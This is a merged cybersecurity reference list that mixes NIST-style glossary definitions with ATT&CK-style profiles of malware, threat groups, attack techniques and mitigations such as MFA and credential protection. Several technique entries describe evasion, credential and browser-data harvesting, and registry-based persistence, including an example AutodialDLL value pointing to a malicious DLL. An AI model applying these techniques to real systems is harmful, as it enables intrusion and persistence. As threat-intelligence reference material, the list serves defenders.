Term: supply chain risk information
Definition: Includes, but is not limited to, information that describes or identifies: (1) Functionality of covered articles, including access to data and information system privileges; (2) Information on the user environment where a covered article is used or installed; (3) The ability of the source to produce and deliver covered articles as expected (i.e., supply chain assurance); (4) Foreign control of, or influence over, the source (e.g., foreign ownership, personal and professional ties between the source and any foreign entity, legal regime of any foreign country in which the source is headquartered or conducts operations); (5) Implications to national security, homeland security, and/or national critical functions associated with use of the covered source; (6) Vulnerability of federal systems, programs, or facilities; (7) Market alternatives to the covered source; (8) Potential impact or harm caused by the possible loss, damage, or compromise of a product, material, or service to an organization’s operations or mission; (9) Likelihood of a potential impact or harm, or the exploitability of a system; (10) Security, authenticity, and integrity of covered articles and their supply and compilation chain; (11) Capacity to mitigate risks identified; (12) Credibility of and confidence in other supply chain risk information; (13) Any other information that would factor into an analysis of the security, integrity, resilience, quality, trustworthiness, or authenticity of covered articles or sources; (14) A summary of the above information and, any other information determined to be relevant to the determination of supply chain risk.

Term: Fuzz Testing
Definition: Similar to fault injection in that invalid data is input into the application via the environment, or input by one process into another process. Fuzz testing is implemented by tools called fuzzers, which are programs or script that submit some combination of inputs to the test target to reveal how it responds.

Term: manipulative communications deception
Definition: Alteration or simulation of friendly telecommunications for the purpose of deception. See communications deception and imitative communications deception. 
Rationale: Listed for deletion in 2010 version of CNSS 4009.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that security risk-related considerations for individual systems, to include the authorization decisions for those systems, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its mission and business functions; and managing risk from individual systems is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission or business success.

Term: trust
Definition: The confidence one element has in another that the second element will behave as expected.

Term: Knowledge-Based Authentication
Definition: Authentication of an individual based on knowledge of information associated with his or her claimed identity in public databases. Knowledge of such information is considered to be private rather than secret, because it may be used in contexts other than authentication to a Verifier, thereby reducing the overall assurance associated with the authentication process.

Term: igamc
Definition: The incomplete gamma function Q(a,x) is defined in Section 5.5.3.

Term: Security Information and Event Management (SIEM) Tool
Definition: Application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface.

Term: Central Verification System
Definition: A system operated by the Office of Personnel Management that contains information on security clearances, investigations, suitability, fitness determinations, [HSPD-12] decisions, PIV credentials, and polygraph data.

Term: Block Cipher Algorithm
Definition: A family of functions and their inverses that is parameterized by a cryptographic key; the function maps bit strings of a fixed length to bit strings of the same length.

Term: Knowledge
Definition: A retrievable set of concepts within memory.

Term: Console
Definition: A visually oriented input and output device used to interact with a computational resource

Term: security architect
Definition: Individual, group, or organization responsible for ensuring that the information security requirements necessary to protect the organization’s core missions and business processes are adequately addressed in all aspects of enterprise architecture including reference models, segment and solution architectures, and the resulting information systems supporting those missions and business processes.

Name: Green Lambert
Type: malware
Description: Green Lambert is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of Green Lambert may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.

Term: Software Identification
Definition: A SWID tag is an ISO 19770-2 compliant XML file describing a software product. It is typically digitally signed by the software manufacturer to verify its validity. Ideally, for purposes of software asset management, the SWID tag will contain the digests (digital fingerprints) of each software file installed or placed on the device with the product.

Term: Identifying Information
Definition: Information that could be used to identify a specific individual, such as name, address, phone number, or identification number.

Term: keying material
Definition: The data (e.g., keys and IVs) necessary to establish and maintain cryptographic keying relationships.

Term: OLIR Catalog
Definition: The OLIR Program’s online site for sharing OLIRs.

Term: information system security officer
Definition: Individual assigned responsibility by the senior agency information security officer, authorizing official, management official, or information system owner for maintaining the appropriate operational security posture for an information system or program

Name: ThreatNeedle
Type: malware
Description: ThreatNeedle is a backdoor that has been used by Lazarus Group since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of Lazarus Group's Manuscrypt (a.k.a. NukeSped) malware family.

Term: Analytic Systems
Definition: IT systems that process the information outputs produced by middleware. Analytic systems may be comprised of databases, data processing software, and Web services.

Term: decapsulation
Definition: The process of applying the Decaps algorithm of a KEM. This algorithm accepts a KEM ciphertext and the decapsulation key as input and produces a shared secret key as output.

Term: CKMS component
Definition: Any hardware, software, or firmware that is used to implement a CKMS. In this Recommendation, the major CKMS components discussed are the Central Oversight Authority, Key Processing Facilities, Service Agents, Client Nodes and Tokens.

Term: CDMA
Definition: A spread spectrum technology for cellular networks based on the Interim Standard-95 (IS-95) from the Telecommunications Industry Association (TIA).

Term: stage
Definition: Period within the life cycle of an entity that relates to the state of its description or realization.

Term: TOFB-I
Definition: TDEA Output Feedback Mode of Operation – Interleaved

Term: Key Management Policy
Definition: A high-level document that identifies a high-level structure, responsibilities, governing standards and guidelines, organizational dependencies and other relationships, and security policies.

Term: commodity service
Definition: A system service provided by a commercial service provider to a large and diverse set of consumers. The organization acquiring or receiving the commodity service possesses limited visibility into the management structure and operations of the provider, and while the organization may be able to negotiate service-level agreements, the organization is typically not able to require that the provider implement specific security or privacy controls.

Name: SysUpdate
Type: malware
Description: SysUpdate is a backdoor written in C++ that has been used by Threat Group-3390 since at least 2020.

Term: supplemental controls
Definition: Controls that may be added to address specific threats or attacks in addition to those controls specified in the assurance levels in these guidelines.

Term: Education
Definition: The ‘Education’ level integrates all of the security skills and competencies of the various functional specialties into a common body of knowledge, adds a multidisciplinary study of concepts, issues, and principles (technological and social), and strives to produce IT security specialists and professionals capable of vision and pro-active response.

Term: reliability
Definition: The ability of a system or component to function under stated conditions for a specified period of time.

Term: weakest judgment algorithm
Definition: An inter-level judgment conflict resolution algorithm where the weakest judgment is taken as the result.

Term: Galois Counter Mode (algorithm)
Definition: Galois/Counter Mode

Term: information system-related security risks
Definition: Risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and that considers impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation. See Risk.

Term: ambiguity rule
Definition: It is assumed that out of publicly available information the contribution of one individual to the cell total can be estimated to within q per cent (q=error before publication); after the publication of the statistic the value can be estimated to within p percent (p=error after publication). In the (p,q) rule the ratio p/q represents the information gain through publication. If the information gain is unacceptable, the cell is declared as confidential. The parameter values p and q are determined by the statistical authority and, thus, define the acceptable level of information gain. In some [National Statistical Organizations] the values of p and q are confidential.

Name: BlackTech
Type: intrusion-set
Description: BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.

Term: cleartext
Definition: Intelligible data, the semantic content of which is available.

Term: Checklist
Definition: A document that contains instructions or procedures for configuring an IT product to an operational environment, for verifying that the product has been configured properly, and/or for identifying unauthorized configuration changes to the product. Also referred to as a security configuration checklist, lockdown guide, hardening guide, security guide, security technical implementation guide (STIG), or benchmark.

Name: Credentials from Password Stores
Type: attack-pattern
Description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

Term: multi-factor authentication
Definition: An authentication system that requires more than one distinct authentication factor for successful authentication. Multifactor authentication can be performed using a multifactor authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions are expected to satisfy the following properties: 1. One-way: it is computationally infeasible to find any input that maps to any pre-specified output, and 2. Collision resistant: It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, enterprise, or other entity.
Note From a privacy perspective, a trustworthy system is a system that meets specific privacy requirements in addition to meeting other critical requirements.

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact agency operations (including safety, mission, functions, image, or reputation), agency assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: high-impact system
Definition: An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS Publication 199 potential impact value of high.

Term: security control and privacy control
Definition: The mechanism that achieves the action.

Name: Lotus Blossom
Type: intrusion-set
Description: Lotus Blossom is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, Lotus Blossom has also targeted entities such as digital certificate issuers.

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service; the potential for a threat source to successfully exploit a particular information system vulnerability.

Term: <em>x mod n</em>
Definition: The modular reduction of the (arbitrary) integer x by the positive integer n (the modulus). For the purposes of this Recommendation, y = x mod n is the unique integer satisfying the following two conditions: 1) 0 £ y < n, and 2) x - y is divisible by n.

Name: Browser Information Discovery
Type: attack-pattern
Description: Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).

Term: Discovery Service
Definition: A service that enables agents to retrieve Web services-related resource description.

Term: operator
Definition: An FCKMS role that is authorized to operate an FCKMS (e.g., initiate the FCKMS, monitor performance, and perform backups), as directed by the system administrator.

Term: process purpose
Definition: High-level objective of performing the process and the likely outcomes of effective implementation of the process.

Term: physical access control system
Definition: An automated system that manages the passage of people or assets through an opening(s) in a secure perimeter(s) based on a set of authorization rules.

Term: public key cryptography (PKC)
Definition: See Asymmetric-key cryptography.

Term: Global Structure/Global Value
Definition: A structure/value that is available by all routines in the test code.

Term: cross domain solution (CDS) filtering
Definition: The process of inspecting data as it traverses a cross domain solution and determines if the data meets pre-defined policy.

Term: SCAP result data stream
Definition: An SCAP data stream that holds output (result) content.

Term: Prepare for Events
Definition: See Capability, Event Preparation Management.

Name: 3CX Supply Chain Attack
Type: campaign
Description: The 3CX Supply Chain Attack was the first publicly reported case of one supply chain compromise triggering another, leading to a cascading, two-stage intrusion. The initial supply chain attack began when a 3CX employee downloaded and executed a trojanized, end-of-life version of the X_Trader trading software from Trading Technologies. This provided UNC4736, a threat cluster associated with AppleJeus, access to the 3CX environment. From there UNC4736 compromised the Windows and macOS build environments used to distribute the 3CX desktop application to their customers. While 3CX serves more than 600,000 customers and 12 million users, only a subset of systems were affected. Subsequent targeting focused on victims in the defense and cryptocurrency sectors, where attackers deployed secondary payloads such as Gopuram for credential theft and persistence. The campaign began in late 2022 and was disrupted after security vendors publicly reported the compromise in March 2023.

Term: Configurable
Definition: A characteristic of a system, device, or software that allows it to be changed by an entity authorized to select or reject specific capabilities to be included in an operational, configured version.

Term: TEE
Definition: An area or enclave protected by a system processor.

Term: specification
Definition: The requirements for the security-relevant portion of the system.
Note: The security specification may be provided as a separate document or may be captured with a broader specification.

Name: Environmental Keying
Type: attack-pattern
Description: Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses. By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult. These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution. By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult. This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

Term: Registry
Definition: A service that allows developers to easily store images as they are created, tag and catalog images for identification and version control to aid in discovery and reuse, and find and download images that others have created.

Name: FIN5
Type: intrusion-set
Description: FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.

Term: Rogue Device
Definition: An unauthorized node on a network.

Term: process outcome
Definition: Observable result of the successful achievement of the process purpose.

Term: party
Definition: An individual (person), organization, device, or process.

Term: NAT
Definition: The process of mapping addresses on one network to addresses on another network.

Name: Turian
Type: malware
Description: Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.

Term: security authorization package
Definition: See security authorization package

Term: National Checklist Program Repository
Definition: A NIST-maintained repository, which is a publicly available resource that contains information on a variety of security configuration checklists for specific IT products or categories of IT products.

Term: POP
Definition: A mailbox access protocol defined by IETF RFC 1939. POP is one of the most commonly used mailbox access protocols.

Term: Manual key transport
Definition: A non-automated means of transporting cryptographic keys by physically moving a device or document containing the key or key share.

Term: Byte
Definition: A group of eight bits that is treated either as a single entity or as an array of eight individual bits.

Term: Participant Guide
Definition: An exercise document that typically contains the exercise’s purpose, scope, objectives, and scenario, and a copy of the IT plan being exercised

Term: accreditation
Definition: Formal recognition that a laboratory is competent to carry out specific tests or calibrations or types of tests or calibrations.

Term: CSN
Definition: The Key Management Infrastructure core node that provides central security management and data management services.

Term: access control
Definition: The process of granting access to information technology (IT) system resources only to authorized users, programs, processes, or other systems.

Term: salt
Definition: A non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker.

Term: categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSSI No.1253 for national security systems and in FIPS 199 for other than national security systems.

Term: learning objectives
Definition: Identifies the outcomes that the learning program sub-component or module should strive to meet for each of the participants and their associated roles in reducing, managing, and mitigating risks.

Term: TTX
Definition: A discussion-based exercise where personnel with roles and responsibilities in a particular IT plan meet in a classroom setting or in breakout groups to validate the content of the plan by discussing their roles during an emergency and their responses to a particular emergency situation. A facilitator initiates the discussion by presenting a scenario and asking questions based on the scenario.

Term: Random Excursion Test
Definition: The purpose of this test is to determine if the number of visits to a state within a random walk exceeds what one would expect for a random sequence.

Name: DarkVishnya
Type: intrusion-set
Description: DarkVishnya is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.

Term: safety
Definition: Freedom from conditions that can cause death, injury, occupational illness, damage to or loss of equipment or property, or damage to the environment.

Term: authorize processing
Definition: The official management decision of the Designated Authorizing Official to permit operation of an issuer after determining that the issuer’s reliability has satisfactorily been established through appropriate assessment processes.

Term: information item
Definition: Separately identifiable body of information that is produced, stored, and delivered for human use.

Term: Object, Assessment
Definition: Passive system-related entity, including bits, bytes, words, fields, devices, files, records, programs, tables, processes, programs, segments, directories, processors, and domains that contain or receive information. Access to an object (by a subject) implies access to the information it contains. Note: Sometimes referred to as "resource."

Term: CVE equivalent
Definition: A vulnerability—known by someone—that has been found in specific software—irrespective of whether that vulnerability is publicly known. CVEs are a subset of CVE equivalents.

Name: Velvet Ant
Type: intrusion-set
Description: Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero day exploits.

Term: mobile code technologies
Definition: Software technologies that provide the mechanisms for the production and use of mobile code.

Term: Value
Definition: A named data value that can be substituted into other items’ properties or into checks.

Term: encryption key
Definition: The cryptographic key used to encrypt a payload. In asymmetric cryptography, the encryption key refers to the public key of the cryptographic key pair. In symmetric cryptography, the encryption key is the symmetric key.

Term: security control
Definition: A safeguard or countermeasure prescribed for a system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.

Name: Multi-factor Authentication
Type: course-of-action
Description: Multi-Factor Authentication (MFA) enhances security by requiring users to provide at least two forms of verification to prove their identity before granting access. These factors typically include:

- *Something you know*: Passwords, PINs.
- *Something you have*: Physical tokens, smartphone authenticator apps.
- *Something you are*: Biometric data such as fingerprints, facial recognition, or retinal scans.

Implementing MFA across all critical systems and services ensures robust protection against account takeover and unauthorized access. This mitigation can be implemented through the following measures:

Identity and Access Management (IAM):

- Use IAM solutions like Azure Active Directory, Okta, or AWS IAM to enforce MFA policies for all user logins, especially for privileged roles.
- Enable conditional access policies to enforce MFA for risky sign-ins (e.g., unfamiliar devices, geolocations).
- Enable Conditional Access policies to only allow logins from trusted devices, such as those enrolled in Intune or joined via Hybrid/Entra.

Authentication Tools and Methods:

- Use authenticator applications such as Google Authenticator, Microsoft Authenticator, or Authy for time-based one-time passwords (TOTP).
- Deploy hardware-based tokens like YubiKey, RSA SecurID, or smart cards for additional security.
- Enforce biometric authentication for compatible devices and applications.

Secure Legacy Systems:

- Integrate MFA solutions with older systems using third-party tools like Duo Security or Thales SafeNet.
- Enable RADIUS/NPS servers to facilitate MFA for VPNs, RDP, and other network logins.

Monitoring and Alerting:

- Use SIEM tools to monitor failed MFA attempts, login anomalies, or brute-force attempts against MFA systems.
- Implement alerts for suspicious MFA activities, such as repeated failed codes or new device registrations.

Training and Policy Enforcement:

- Educate employees on the importance of MFA and secure authenticator usage.
- Enforce policies that require MFA on all critical systems, especially for remote access, privileged accounts, and cloud applications.

Term: cipher text
Definition: Data in its encrypted form.

Term: Location Information (LOCI)
Definition: The Location Area Identifier (LAI) of the phone’s current location, continuously maintained on the (C/U)SIM when the phone is active and saved whenever the phone is turned off.

Name: ZxxZ
Type: malware
Description: ZxxZ is a trojan written in Visual C++ that has been used by BITTER since at least August 2021, including against Bangladeshi government personnel.

Term: Requester
Definition: An individual, process, or device that causes information to flow among objects or change to the system state. Also see object.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host.

Term: Soft fork
Definition: A change to a blockchain implementation that is backwards compatible. Non-updated nodes can continue to transact with updated nodes.

Term: Output space
Definition: The set of all possible distinct bitstrings that may be obtained as samples from a digitized noise source.

Term: Requester
Definition: The entity (person or organization) that wishes to make use of a provider’s Web service. It will use a requester agent to exchange messages with the provider’s provider agent. “Requester” is also used as a shorthand to refer to the requester agent acting on the requester’s behalf.

Term: SSP
Definition: Formal document that provides an overview of the security requirements for the system and describes the security controls in place or planned for meeting those requirements.

Term: common carrier
Definition: In a telecommunications context, a telecommunications company that holds itself out to the public for hire to provide communications transmission services. 
Note: In the United States, such companies are usually subject to regulation by federal and state regulatory commissions.

Term: ACP
Definition: High-level requirements that specify how access is managed and who may access information under what circumstances.

Name: Credential Access Protection
Type: course-of-action
Description: Credential Access Protection focuses on implementing measures to prevent adversaries from obtaining credentials, such as passwords, hashes, tokens, or keys, that could be used for unauthorized access. This involves restricting access to credential storage mechanisms, hardening configurations to block credential dumping methods, and using monitoring tools to detect suspicious credential-related activity. This mitigation can be implemented through the following measures:

Restrict Access to Credential Storage:

- Use Case: Prevent adversaries from accessing the SAM (Security Account Manager) database on Windows systems.
- Implementation: Enforce least privilege principles and restrict administrative access to credential stores such as `C:\Windows\System32\config\SAM`.

Use Credential Guard:

- Use Case: Isolate LSASS (Local Security Authority Subsystem Service) memory to prevent credential dumping.
- Implementation: Enable Windows Defender Credential Guard on enterprise endpoints to isolate secrets and protect them from unauthorized access.

Monitor for Credential Dumping Tools:

- Use Case: Detect and block known tools like Mimikatz or Windows Credential Editor.
- Implementation: Flag suspicious process behavior related to credential dumping.

Disable Cached Credentials:

- Use Case: Prevent adversaries from exploiting cached credentials on endpoints.
- Implementation: Configure group policy to reduce or eliminate the use of cached credentials (e.g., set Interactive logon: Number of previous logons to cache to 0).

Enable Secure Boot and Memory Protections:

- Use Case: Prevent memory-based attacks used to extract credentials.
- Implementation: Configure Secure Boot and enforce hardware-based security features like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).

Term: bit string
Definition: An ordered sequence of 0’s and 1’s.

Term: RAND
Definition: For the purposes of this Recommendation, a value in a set that has an equal probability of being selected from the total population of possibilities and, hence, is unpredictable. A random number is an instance of an unbiased random variable, that is, the output produced by a uniformly distributed random process.

Term: assessment method
Definition: One of three types of actions (examine, interview, test) taken by assessors in obtaining evidence during an assessment.

Term: network
Definition: An open communications medium, typically the Internet, used to transport messages between the claimant and other parties. Unless otherwise stated, no assumptions are made about the network’s security; it is assumed to be open and subject to active (e.g., impersonation, man-in-the- middle, session hijacking) and passive (e.g., eavesdropping) attack at any point between the parties (e.g., claimant, verifier, CSP, RP).

Term: public key certificate
Definition: A digital document issued and digitally signed by the <em>private key </em>of a certificate authority that binds an <i>identifier </i>to a subscriber’s <i>public key</i>. The certificate indicates that the <i>subscriber </i>identified in the certificate has sole control of and access to the <i>private key</i>. See also [RFC5280].

Term: <em>Narrowest internal width</em>
Definition: The maximum amount of information from the input that can affect the output. For example, if f(x) = SHA-1(x) || 01, and x consists of a string of 1000 binary bits, then the narrowest internal width of f(x) is 160 bits (the SHA-1 output length), and the output width of f(x) is 162 bits (the 160 bits from the SHA-1 operation, concatenated by 01).

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation while an entity without knowledge of the key cannot. Examples include 1. The transformation of plaintext data into ciphertext data, 2. The transformation of ciphertext data into plaintext data, 3. The computation of a digital signature from data, 4. The verification of a digital signature, 5. The computation of a message authentication code (MAC) from data, 6. The verification of a MAC received with data, 7. The computation of a shared secret that is used to derive keying material.

Term: SCAP content
Definition: Part or all of one or more SCAP data streams.

Term: DoS
Definition: The prevention of authorized access to resources or the delaying of time-critical operations.

Term: Authorized Entity
Definition: An entity that has implicitly or explicitly been granted approval to interact with a particular IoT device. The device cybersecurity capabilities in the core baseline do not specify how authorization is implemented for distinguishing authorized and unauthorized entities, but can include identity management and authentication to establish the authorization of entities. It is left to the organization to decide how each device will implement authorization. Also, an entity authorized to interact with an IoT device in one way might not be authorized to interact with the same device in another way.

Term: Log Viewing
Definition: Displaying log entries in a human-readable format.

Term: Risk Profile
Definition: A prioritized inventory of the most significant risks identified and assessed through the risk assessment process versus a complete inventory of risks.

Term: Log Parsing
Definition: Extracting data from a log so that the parsed values can be used as input for another logging process.

Term: Logical Identifier
Definition: A device identifier that is expressed logically by the device’s software. An example is a media access control (MAC) address assigned to a network interface.

Term: Domain parameter
Definition: A parameter used in conjunction with some public-key algorithms to generate key pairs, to create digital signatures, or to establish keying material.

Term: point at infinity
Definition: Identity element of a Montgomery curve or a curve in short-Weierstrass form.

Term: Source Name
Definition: A single WFN that a matching engine compares to a target WFN to determine whether or not there is a source-to-target match. (This is the X value in the CPE 2.2 matching algorithm.)

Name: QUIETCANARY
Type: malware
Description: QUIETCANARY is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.

Term: Sidechain
Definition: A blockchain with its own consensus mechanism and set of nodes that is connected to another blockchain through a two-way bridge.

Name: DCSrv
Type: malware
Description: DCSrv is destructive malware that has been used by Moses Staff since at least September 2021. Though DCSrv has ransomware-like capabilities, Moses Staff does not demand ransom or offer a decryption key.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions are expected to satisfy the following properties: 
1. One-way: It is computationally infeasible to find any input that maps to any pre-specified output, and 
2. Collision resistant: It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: Simple Certificate Enrollment Protocol (SCEP)
Definition: A protocol defined in an IETF internet draft specification that is used by numerous manufacturers of network equipment and software who are developing simplified means of handling certificates for large-scale implementation to everyday users, as well as referenced in other industry standards.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data.

Term: senior agency information security officer (SAISO)
Definition: See Senior Agency Information Security Officer.

Term: party
Definition: An individual (person), organization, device, or a combination thereof. In this Recommendation, an entity may be a functional unit that executes certain processes.

Term: Forensic science
Definition: The use or application of scientific knowledge to a point of law, especially as it applies to the investigation of crime

Term: Key destruction
Definition: To remove all traces of a cryptographic key so that it cannot be recovered by either physical or electronic means.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have adverse impacts on the confidentiality, integrity, or availability of a system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.

Name: Services Registry Permissions Weakness
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. 

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.

The <code>Performance</code> key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL. If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.

Adversaries may also add the <code>Parameters</code> key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the <code>Parameters</code> key of a given services registry configuration. By placing and configuring the <code>Parameters</code> key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.

For example, the registry path <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters</code> contains the <code>AutodiaDLL</code> value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the <code>AutodiaDLL</code> to point to a hijacked or malicious DLL:

<code>"AutodialDLL"="c:\temp\foo.dll"</code>

This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.

Term: Antivirus Software
Definition: A program specifically designed to detect many forms of malware and prevent them from infecting computers, as well as cleaning computers that have already been infected.

Term: Online Certificate Status Protocol responder
Definition: A PKI entity that verifies the revocation status of certificates following the Online Certificate Status Protocol (specified in RFC 6960).

Term: restoration
Definition: The process of changing the status of a suspended (i.e., temporarily invalid) certificate to valid.

Term: <em>s2</em>
Definition: The variance of a random variable = (standard deviation)2.

Term: customer
Definition: Organization or person that receives a product or service.

Term: patch level
Definition: Denotes either a patch level or a patch set. More specifically, when patches must be applied in order, the patch level is the identifier of the most recently applied patch.

Name: metaMain
Type: malware
Description: metaMain is a backdoor used by Metador to maintain long-term access to compromised machines; it has also been used to decrypt Mafalda into memory.

Name: BBK
Type: malware
Description: BBK is a downloader that has been used by BRONZE BUTLER since at least 2019.

Term: <em>Vn</em>
Definition: The expected number of runs that would occur in a sequence of length n under an assumption of randomness See Sections 2.3 and 3.3.

Term: Originator-usage period
Definition: The period of time in the cryptoperiod of a symmetric key during which cryptographic protection may be applied to data.

Term: non-fungible token
Definition: An owned, transferable, and indivisible data record that is a digital representation of a physical or virtual linked asset. The data record is created and managed by a smart contract on a blockchain.

Term: Consortium
Definition: A group of organizations or individuals with the objective of mutualizing resources for achieving a common goal (e.g., operating a consortium blockchain).

Term: CSF Community Profile
Definition: A baseline of CSF outcomes that is created and published to address shared interests and goals among a number of organizations. A Community Profile is typically developed for a particular sector, subsector, technology, threat type, or other use case. An organization can use a Community Profile as the basis for its own Target Profile.

Name: BRUSHFIRE
Type: malware
Description: BRUSHFIRE is a passive backdoor written in C that executes in-memory within an existing process. First reported in March 2025, BRUSHFIRE has been observed in activity attributed to People's Republic of China (PRC) state-affiliated threat actors, including UNC5221 and SYLVANITE.

Term: Secret keying material
Definition: The binary data that is used to form secret keys, such as AES encryption keys or HMAC keys.

Term: spyware
Definition: Software that is secretly or surreptitiously installed into an information system to gather information on individuals or organizations without their knowledge.

Term: Entropy Source
Definition: The combination of a noise source, health tests, and optional conditioning component that produce bitstrings containing entropy.

Name: Remote Access Tools
Type: attack-pattern
Description: An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management. Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Remote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.

